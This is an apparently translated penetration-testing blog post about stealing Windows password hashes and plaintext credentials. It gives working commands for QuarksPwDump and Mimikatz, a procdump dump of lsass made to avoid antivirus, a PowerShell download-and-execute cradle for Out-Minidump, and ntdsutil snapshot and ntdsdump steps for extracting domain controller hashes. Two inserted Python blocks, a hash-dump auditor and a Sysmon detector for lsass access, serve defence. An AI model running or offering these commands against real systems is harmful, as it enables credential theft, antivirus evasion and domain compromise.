About Windows system password fetching

Source: Internet
Author: User
Tags: knowledge base

0x01 Windows password hash

Early versions of the SMB protocol transmitted plaintext passwords over the network. The later "LAN Manager challenge/response" authentication mechanism, LM for short, was so simple that it could be cracked easily, so Microsoft introduced the Windows NT challenge/response mechanism, called NTLM; today there are also the newer NTLMv2 and the Kerberos authentication system. The encrypted form in which Windows stores a password is called a hash, and by default a Windows system password hash consists of two parts: the first part is the LM-hash, the second part is the NTLM-hash.

Unlike the LM-hash algorithm, the NTLM-hash algorithm is case-sensitive with respect to the plaintext password, it is not possible to tell from an NTLM-hash whether the original plaintext password is shorter than 8 bytes, and the magic string "KGS!@#$%" is gone. MD4 is a true one-way hash function, so it is considerably harder to recover the plaintext that went into it. The problem is that Microsoft insists on the high strength of NTLM-hash while avoiding the fact that, to maintain backward compatibility, NTLM-hash is by default always used together with LM-hash. This means the higher strength of NTLM-hash is no real gain in safety and is potentially harmful to security: with NTLM-hash added, one first exploits the weakness of LM-hash to recover a case-insensitive version of the original plaintext password, and then uses NTLM-hash to correct the case of that password.

The password hash format under Windows is: user name:RID:LM-hash:NT-hash:::, for example:

Administrator:500:c8825db10f2590eaaad3b435b51404ee:683020925c5d8569c23aa724774ce6cc:::

which means:

User name: Administrator

RID: 500

LM-hash value: c8825db10f2590eaaad3b435b51404ee

NT-hash value: 683020925c5d8569c23aa724774ce6cc

If you know a user's password hash, take c8825db10f2590eaaad3b435b51404ee:683020925c5d8569c23aa724774ce6cc to an online hash lookup site.
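As an added example (not part of the original post), here is a small Python parser and audit for the user name:RID:LM-hash:NT-hash::: format described above, written from the defender's side: given such a dump, it reports which accounts still have an LM-hash stored, whose LM-hash reveals a password of at most 7 characters, who has a blank password, and which accounts share a password. The Administrator line is the one quoted in the text; the Guest and svc_backup lines are constructed. The two empty-password constants (aad3b435b51404eeaad3b435b51404ee for LM, 31d6cfe0d16ae931b73c59d7e0c089c0 for NT) are well-known values assumed here, not taken from the page.

```python
import re
from collections import defaultdict

# Constructed sample in pwdump format (user name:RID:LM-hash:NT-hash:::).
# The Administrator line is the one quoted above; the other accounts are made up.
SAMPLE_DUMP = """\
Administrator:500:c8825db10f2590eaaad3b435b51404ee:683020925c5d8569c23aa724774ce6cc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:683020925c5d8569c23aa724774ce6cc:::
# comment lines and blank lines are ignored
"""

# Well-known constants (assumed here, not taken from the text above):
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"  # LM-hash of the empty password, i.e. "no LM-hash stored"
LM_EMPTY_HALF = "aad3b435b51404ee"             # LM-hash half produced by an all-zero 7-byte key block
NT_EMPTY = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT-hash (MD4 of UTF-16LE) of the empty password

_RECORD = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_pwdump_line(line):
    """Split one user:RID:LM-hash:NT-hash::: record into fields; hashes are normalised to lowercase."""
    m = _RECORD.match(line.strip())
    if not m:
        raise ValueError(f"not a pwdump record: {line!r}")
    return {"user": m["user"], "rid": int(m["rid"]), "lm": m["lm"].lower(), "nt": m["nt"].lower()}


def parse_pwdump(text):
    """Parse a whole dump, skipping blank lines and '#' comments."""
    return [
        parse_pwdump_line(line)
        for line in text.splitlines()
        if line.strip() and not line.lstrip().startswith("#")
    ]


def audit(records):
    """Report the weaknesses a defender looks for in a dump of this format."""
    findings = defaultdict(list)
    users_by_nt = defaultdict(list)
    for r in records:
        if r["lm"] != LM_EMPTY:
            # An LM-hash is stored at all: LM storage was still enabled when this password was last set.
            findings["lm_hash_stored"].append(r["user"])
            if r["lm"].endswith(LM_EMPTY_HALF):
                # Second half equals the empty block: the password is at most 7 characters long.
                findings["password_at_most_7_chars"].append(r["user"])
        if r["nt"] == NT_EMPTY:
            findings["blank_password"].append(r["user"])
        users_by_nt[r["nt"]].append(r["user"])
    for nt, users in users_by_nt.items():
        if nt != NT_EMPTY and len(users) > 1:
            # Identical NT-hashes mean identical passwords: one cracked password opens several accounts.
            findings["shared_password"].append(sorted(users))
    return dict(findings)


if __name__ == "__main__":
    for key, value in audit(parse_pwdump(SAMPLE_DUMP)).items():
        print(f"{key}: {value}")
```

The second-half check is exactly the LM weakness the text describes: the password is padded to 14 bytes and split into two 7-byte halves, so a password of 7 characters or fewer leaves the second half all zeros and its hash half constant.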

0x02 Quarkspwdump

Generally QUARKSPWDUMP_V0.2B is used to dump the password hashes of the whole Windows series, and the hash values obtained are then queried at http://www.objectif-securite.ch/ophcrack.php.

The QuarksPwDump command to dump the password hashes is as follows (other commands can be found in the software's documentation):

QuarksPwDump.exe -dhl

Take the whole hash value obtained to be cracked online.

0x03 Mimikatz

Testing the password grabbing artifact Mimikatz, the commands are as follows:

privilege::debug
sekurlsa::logonpasswords

The result is shown in the figure below:

It can be seen that the LM-hash dumped by Mimikatz differs from the one dumped by Quarkspwdump, and that Mimikatz directly obtains the system's plaintext password; the NT-hash obtained by the two tools is identical.

This scenario arises during penetration testing: I have connected to the target host with Chopper, but the system has 360 Safeguard or other security software installed by default, and the Mimikatz and Quarkspwdump I uploaded were both removed by it. In other words, the conventional approach of using these two tools to obtain the system's password hashes is unlikely to succeed. In fact, we can first dump the lsass memory of the target host and then process the dump with Mimikatz on our own machine, which yields the target system's hashes and passwords.

Procdump can be downloaded from Microsoft's official website, and it will certainly not be flagged or removed by antivirus software.

The command is as follows:

procdump.exe -accepteula -ma lsass.exe lsass.dmp

This is shown in the figure below:

Next, we demonstrate using Mimikatz locally to process the dump:

First enter the command:

sekurlsa::minidump lsass.dmp

Then enter the command:

sekurlsa::logonpasswords

As can be seen, the system password can be obtained offline in this way, which bypasses the antivirus software's detection on the target side.

The cloud knowledge base also documents a command that does the same work as Procdump with PowerShell. The specific command is as follows:

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); Get-Process lsass | Out-Minidump

I tried it on the compromised host and found that it works, although the Chopper virtual terminal shows an error while the PowerShell code has in fact executed successfully. Overall, though, Procdump still feels more convenient to use.

Mimikatz is also integrated into Metasploit; for a tutorial see http://www.offensive-security.com/metasploit-unleashed/Mimikatz
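Every variant above (Mimikatz in-memory, procdump -ma, Out-Minidump) has to open a handle to lsass.exe with at least PROCESS_QUERY_INFORMATION (0x0400) and PROCESS_VM_READ (0x0010), which is what MiniDumpWriteDump requires, so that handle open is the natural place to detect the whole section. The following is an added example, not from the original post: a Python detector run over constructed Sysmon Event ID 10 (ProcessAccess) records in JSON-lines form. The field names (SourceImage, TargetImage, GrantedAccess, UtcTime) are Sysmon's; the sample events and the ALLOWED_SOURCES list are assumptions and must be tuned to the environment.

```python
import json

# Process-access rights relevant to reading another process's memory (Win32 constants).
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
# MiniDumpWriteDump (the API behind procdump -ma and Out-Minidump) needs both of these rights.
DUMP_MASK = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION

# Tuning assumption: system components that legitimately open lsass.exe with broad rights.
# This allowlist is an example only and must be adapted to the environment.
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}

# Constructed Sysmon Event ID 10 (ProcessAccess) records, one JSON object per line, in the shape a
# log forwarder might emit. These are sample events, not real telemetry.
SAMPLE_EVENTS = r"""
{"EventID": 10, "UtcTime": "2024-01-01 10:00:01.000", "SourceImage": "C:\\Tools\\procdump.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF"}
{"EventID": 10, "UtcTime": "2024-01-01 10:00:02.000", "SourceImage": "C:\\Windows\\System32\\csrss.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF"}
{"EventID": 10, "UtcTime": "2024-01-01 10:00:03.000", "SourceImage": "C:\\Windows\\System32\\svchost.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000"}
{"EventID": 10, "UtcTime": "2024-01-01 10:00:04.000", "SourceImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1410"}
{"EventID": 10, "UtcTime": "2024-01-01 10:00:05.000", "SourceImage": "C:\\Windows\\explorer.exe", "TargetImage": "C:\\Windows\\System32\\notepad.exe", "GrantedAccess": "0x1FFFFF"}
{"EventID": 1, "UtcTime": "2024-01-01 10:00:06.000", "Image": "C:\\Tools\\procdump.exe", "CommandLine": "procdump.exe -accepteula -ma lsass.exe lsass.dmp"}
"""


def is_lsass_dump_access(event):
    """True when a non-allowlisted process opened lsass.exe with rights sufficient to dump it."""
    if event.get("EventID") != 10:
        return False
    target = event.get("TargetImage", "").lower()
    if not target.endswith("\\lsass.exe"):
        return False
    granted = int(event.get("GrantedAccess", "0x0"), 16)
    if (granted & DUMP_MASK) != DUMP_MASK:
        return False  # e.g. 0x1000 (PROCESS_QUERY_LIMITED_INFORMATION) alone cannot read memory
    return event.get("SourceImage", "").lower() not in ALLOWED_SOURCES


def detect_lsass_access(jsonl_text):
    """Return (UtcTime, SourceImage, granted mask) for each suspicious lsass.exe handle open."""
    hits = []
    for line in jsonl_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        if is_lsass_dump_access(event):
            hits.append((event["UtcTime"], event["SourceImage"], int(event["GrantedAccess"], 16)))
    return hits


if __name__ == "__main__":
    for when, source, mask in detect_lsass_access(SAMPLE_EVENTS):
        print(f"{when}  {source}  GrantedAccess=0x{mask:X}")
```

Matching on the access mask rather than on the tool's file name is what makes this robust to the renaming and offline-processing tricks the section describes: the dump file is produced by a Microsoft-signed binary, but the handle it needs looks the same regardless of who opens it.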

0x04 Ntdsdump

Unable to bear ntdsxtract's snail-like speed, I modified Quarkspwdump into an offline extraction tool that can read system.hiv.

ntds.dit is actually an ESENT database, and Microsoft itself documents a set of APIs for operating on such databases.

Its command line is as follows:

ntdsdump.exe <-f ntds.dit> <-k hex-sys-key | -s system.hiv> [-o out.txt] [-h] [-t john|lc]

-f path to ntds.dit

-k SysKey in hexadecimal format (optional)

-s path to system.hiv (optional)

-h also export password history records

-t export format, lc or john

-o export to the specified file

The SysKey is actually the class information of the subkeys under HKLM\SYSTEM\CurrentControlSet\Control\Lsa, which can be queried with RegQueryInfoKey.

The attachment provides two SysKey export tools. Getsyskey_c.exe is compiled with VC6; its source is Getsyskey.cpp, which can be compiled by opening it directly in VC6.

Getsyskey_cs.exe is compiled against .NET 2.0; its source is Getsyskey.cs, which can be compiled directly with csc.

Known error:

JetAttachDatabase() failed

Cause: the database needs repair; run esentutl /p /o ntds.dit to repair it.


Also: after making the change I looked at Quarkspwdump's GitHub and found that someone had submitted a pull request: https://github.com/quarkslab/quarkspwdump/pull/3

It adds a function that loads system.hiv by calling RegLoadKey. That API requires getting past UAC, so it is very awkward to use; reading the file directly, as done here, is more comfortable.

SecPulse's approach

On 2008+ domain controllers, export ntds.dit, SAM and SYSTEM using an ntdsutil snapshot mount:

ntdsutil
snapshot
activate instance ntds
create
mount {GUID}
copy c:\MOUNT_POINT\WINDOWS\NTDS\ntds.dit c:\NTDS_saved.dit
unmount {GUID}
quit
quit

Then copy whatever else is needed.

Use QuarksPwDump.exe to dump the domain hashes on the domain controller:

QuarksPwDump.exe --dump-hash-domain --output SecPulseHash.txt --ntds-file c:\ntds.dit

Downloading the files back and re-running Quarkspwdump locally does not seem to work, mainly because the SYSTEM file cannot be specified locally, so the key cannot be obtained.

Attached are the Quarks PwDump usage parameters:

quarks-pwdump.exe <options>

Options:

-dhl --dump-hash-local

-dhdc --dump-hash-domain-cached

-dhd --dump-hash-domain (NTDS_FILE must be specified)

-db --dump-bitlocker (NTDS_FILE must be specified)

-nt --ntds-file FILE

-hist --with-history (optional)

-t --output-type john/lc (optional, if none => john)

-o --output FILE (optional, if none => stdout)

Example: quarks-pwdump.exe --dump-hash-domain --with-history

Of course, you can also download ntds.dit, SAM and SYSTEM back (the NTDS of many networks is several GB, so downloading it back is not very practical) and decrypt them with a tool, but that feels a bit heavy; now we can use NTDSDump.exe instead:

ntdsdump.exe -f ntds.dit -s SYSTEM -o SecPulseHash.txt

0x05 Reference Links

https://www.secpulse.com/archives/6301.html

https://www.cnblogs.com/hiccup/p/4380298.html
